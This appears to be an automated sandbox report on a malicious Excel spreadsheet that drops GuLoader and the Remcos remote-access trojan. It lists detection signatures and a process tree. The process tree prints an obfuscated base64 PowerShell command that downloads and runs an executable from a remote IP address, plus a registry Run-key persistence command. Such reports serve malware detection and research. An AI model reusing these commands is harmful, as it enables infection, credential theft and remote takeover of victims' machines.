Edit tour
Windows
Analysis Report
PO 11001 .xls
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w7x64
- EXCEL.EXE (PID: 3660 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3924 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 4008 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWeRS HElL -Ex BypaSs -nOp -W 1 -c DeVIcEcRE dENTiaLdEp lOYMENT.eX e ; iEx( $(ieX('[SY sTeM.TExT. ENcODINg]' +[Char]0X3 a+[Char]0X 3A+'Utf8.g etstRiNg([ SYstEm.coN vErt]'+[ch AR]58+[cHa r]58+'FroM BAsE64sTrI ng('+[chaR ]34+'JEFLI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEF EZC10eVBlI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW1lTWJ lUkRlZmlua VRpT24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVVJ MTU9OLkRsb CIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEZ3d 0ssc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgREhBS GdCREYsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ khzLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBUVyxJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB wdXphbUVkK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 BTUUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAic 3MiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 BTUVzUGFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIElrc25 0TGdtU3F0I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRBSzo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE5Mi4 zLjIyMC4yM i80MzAvZGx saG9zdC5le GUiLCIkZW5 2OkFQUERBV EFcZGxsaG9 zdC5leGUiL DAsMCk7c3R hclQtc2xFR XAoMyk7U1R hUnQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAiJ EVuVjpBUFB EQVRBXGRsb Ghvc3QuZXh lIg=='+[cH AR]0x22+') )')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 4032 cmdline:
PoWeRSHElL -Ex Byp aSs -nOp -W 1 -c DeV IcEcREdENT iaLdEplOYM ENT.eXe ; iEx($(ie X('[SYsTeM .TExT.ENcO DINg]'+[Ch ar]0X3a+[C har]0X3A+' Utf8.getst RiNg([SYst Em.coNvErt ]'+[chAR]5 8+[cHar]58 +'FroMBAsE 64sTrIng(' +[chaR]34+ 'JEFLICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFEZC1 0eVBlICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W1lTWJlUkR lZmluaVRpT 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVVJMTU9 OLkRsbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQ2hhclN ldCA9IENoY XJTZXQuVW5 pY29kZSldc HVibGljIHN 0YXRpYyBle HRlcm4gSW5 0UHRyIFVST ERvd25sb2F kVG9GaWxlK EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEZ3d0ssc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gREhBSGdCR EYsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQkhzL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB UVyxJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBwdXp hbUVkKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU5BTUU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAic3MiI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5BTUV zUGFDZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI Elrc250TGd tU3F0ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICRBS zo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE5Mi4zLjI yMC4yMi80M zAvZGxsaG9 zdC5leGUiL CIkZW52OkF QUERBVEFcZ GxsaG9zdC5 leGUiLDAsM Ck7c3RhclQ tc2xFRXAoM yk7U1RhUnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiJEVuV jpBUFBEQVR BXGRsbGhvc 3QuZXhlIg= ='+[cHAR]0 x22+'))')) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3152 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\sm41ls yu\sm41lsy u.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3168 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESA499.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\sm4 1lsyu\CSCE 0CED41DA99 B458392766 F6BC82F0D5 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - dllhost.exe (PID: 3308 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 450228D72F9F726B645C55BBBC6DB905) - powershell.exe (PID: 3388 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$k rjning=Get -Content - Raw 'C:\Us ers\user\A ppData\Roa ming\inter cessionate \Favourabl ies117\sul fonylurea\ Aerognosy. Res';$Luke warmly95=$ krjning.Su bString(53 22,3);.$Lu kewarmly95 ($krjning) " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - Vaccinerende.exe (PID: 924 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Vaccin erende.exe " MD5: 450228D72F9F726B645C55BBBC6DB905) - cmd.exe (PID: 1908 cmdline:
"C:\Window s\System32 \cmd.exe" /c REG ADD HKCU\Soft ware\Micro soft\Windo ws\Current Version\Ru n /f /v "C hivey57" / t REG_EXPA ND_SZ /d " %Misbehave rs% -windo wstyle 1 $ Frligheden =(gp -Path 'HKCU:\So ftware\Ros coelite\') .Aftvttede s;%Misbeha vers% ($Fr ligheden)" MD5: AD7B9C14083B52BC532FBA5948342B98) - reg.exe (PID: 3084 cmdline:
REG ADD HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / f /v "Chiv ey57" /t R EG_EXPAND_ SZ /d "%Mi sbehavers% -windowst yle 1 $Frl igheden=(g p -Path 'H KCU:\Softw are\Roscoe lite\').Af tvttedes;% Misbehaver s% ($Frlig heden)" MD5: D69A9ABBB0D795F21995C2F48C1EB560) - Vaccinerende.exe (PID: 4028 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \uufpqcznf pbrpkbrchv wvbbgmplrt lta" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 4008 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \wwta" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 2740 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \hrysrnv" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 1308 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \jypyihgkg " MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 2192 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \tsdrjareu rci" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 3596 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \wvibksbfi zuvagm" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 2420 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \iwmakfxbv kkvnuhajhe o" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 3920 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \krsslxicr scipavesrr qbfdw" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 2512 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \vtxdlqtwf aunaojibcl rekqfvdn" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 2992 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \myrqksteq vbcbpuimnl ztpdvy" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 3472 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \xtwidkeye dthlwimexy aecymzxube " MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 1872 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \zvbbddpzs llmnceqnit chhsvidlcg nnv" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 332 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \jghbahqih jysxfkijlb zkstdovyth " MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 1876 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \tamubzacv rqfilguawn anwnuwchui xxt" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 1820 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \dcam" MD5: 450228D72F9F726B645C55BBBC6DB905) - Vaccinerende.exe (PID: 1908 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\Vaccine rende.exe /stext "C: \Users\use r\AppData\ Local\Temp \ctsuyeuks gddrommozv fphobcmulr " MD5: 450228D72F9F726B645C55BBBC6DB905) - mshta.exe (PID: 1852 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 1392 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWeRS HElL -Ex BypaSs -nOp -W 1 -c DeVIcEcRE dENTiaLdEp lOYMENT.eX e ; iEx( $(ieX('[SY sTeM.TExT. ENcODINg]' +[Char]0X3 a+[Char]0X 3A+'Utf8.g etstRiNg([ SYstEm.coN vErt]'+[ch AR]58+[cHa r]58+'FroM BAsE64sTrI ng('+[chaR ]34+'JEFLI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEF EZC10eVBlI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW1lTWJ lUkRlZmlua VRpT24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVVJ MTU9OLkRsb CIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEZ3d 0ssc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgREhBS GdCREYsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ khzLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBUVyxJb nRQdHIgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB wdXphbUVkK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 BTUUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAic 3MiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 BTUVzUGFDZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIElrc25 0TGdtU3F0I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRBSzo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE5Mi4 zLjIyMC4yM i80MzAvZGx saG9zdC5le GUiLCIkZW5 2OkFQUERBV EFcZGxsaG9 zdC5leGUiL DAsMCk7c3R hclQtc2xFR XAoMyk7U1R hUnQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAiJ EVuVjpBUFB EQVRBXGRsb Ghvc3QuZXh lIg=='+[cH AR]0x22+') )')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 2372 cmdline:
PoWeRSHElL -Ex Byp aSs -nOp -W 1 -c DeV IcEcREdENT iaLdEplOYM ENT.eXe ; iEx($(ie X('[SYsTeM .TExT.ENcO DINg]'+[Ch ar]0X3a+[C har]0X3A+' Utf8.getst RiNg([SYst Em.coNvErt ]'+[chAR]5 8+[cHar]58 +'FroMBAsE 64sTrIng(' +[chaR]34+ 'JEFLICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFEZC1 0eVBlICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W1lTWJlUkR lZmluaVRpT 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVVJMTU9 OLkRsbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQ2hhclN ldCA9IENoY XJTZXQuVW5 pY29kZSldc HVibGljIHN 0YXRpYyBle HRlcm4gSW5 0UHRyIFVST ERvd25sb2F kVG9GaWxlK EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEZ3d0ssc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gREhBSGdCR EYsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQkhzL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB UVyxJbnRQd HIgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBwdXp hbUVkKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU5BTUU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAic3MiI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5BTUV zUGFDZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI Elrc250TGd tU3F0ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICRBS zo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE5Mi4zLjI yMC4yMi80M zAvZGxsaG9 zdC5leGUiL CIkZW52OkF QUERBVEFcZ GxsaG9zdC5 leGUiLDAsM Ck7c3RhclQ tc2xFRXAoM yk7U1RhUnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiJEVuV jpBUFBEQVR BXGRsbGhvc 3QuZXhlIg= ='+[cHAR]0 x22+'))')) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3584 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\r4gn3n q1\r4gn3nq 1.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3424 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESF72C.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\r4g n3nq1\CSCA 7279739985 342FFA8B69 46FD4222CB 8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - dllhost.exe (PID: 1536 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 450228D72F9F726B645C55BBBC6DB905) - powershell.exe (PID: 2596 cmdline:
"powershel l.exe" -wi ndowstyle hidden "$k rjning=Get -Content - Raw 'C:\Us ers\user\A ppData\Roa ming\inter cessionate \Favourabl ies117\sul fonylurea\ Aerognosy. Res';$Luke warmly95=$ krjning.Su bString(53 22,3);.$Lu kewarmly95 ($krjning) " MD5: EB32C070E658937AA9FA9F3AE629B2B8) - Vaccinerende.exe (PID: 3116 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Vaccin erende.exe " MD5: 450228D72F9F726B645C55BBBC6DB905)
- powershell.exe (PID: 3852 cmdline:
"C:\window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le 1 $Frli gheden=(gp -Path 'HK CU:\Softwa re\Roscoel ite\').Aft vttedes;c: \windows\S ysWOW64\Wi ndowsPower Shell\v1.0 \powershel l.exe ($Fr ligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 1848 cmdline:
"C:\window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" "$krjning= Get-Conten t -Raw 'C: \Users\use r\AppData\ Roaming\in tercession ate\Favour ablies117\ sulfonylur ea\Aerogno sy.Res';$L ukewarmly9 5=$krjning .SubString (5322,3);. $Lukewarml y95($krjni ng)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 1504 cmdline:
"C:\window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le 1 $Frli gheden=(gp -Path 'HK CU:\Softwa re\Roscoel ite\').Aft vttedes;c: \windows\S ysWOW64\Wi ndowsPower Shell\v1.0 \powershel l.exe ($Fr ligheden) MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3752 cmdline:
"C:\window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" "$krjning= Get-Conten t -Raw 'C: \Users\use r\AppData\ Roaming\in tercession ate\Favour ablies117\ sulfonylur ea\Aerogno sy.Res';$L ukewarmly9 5=$krjning .SubString (5322,3);. $Lukewarml y95($krjni ng)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |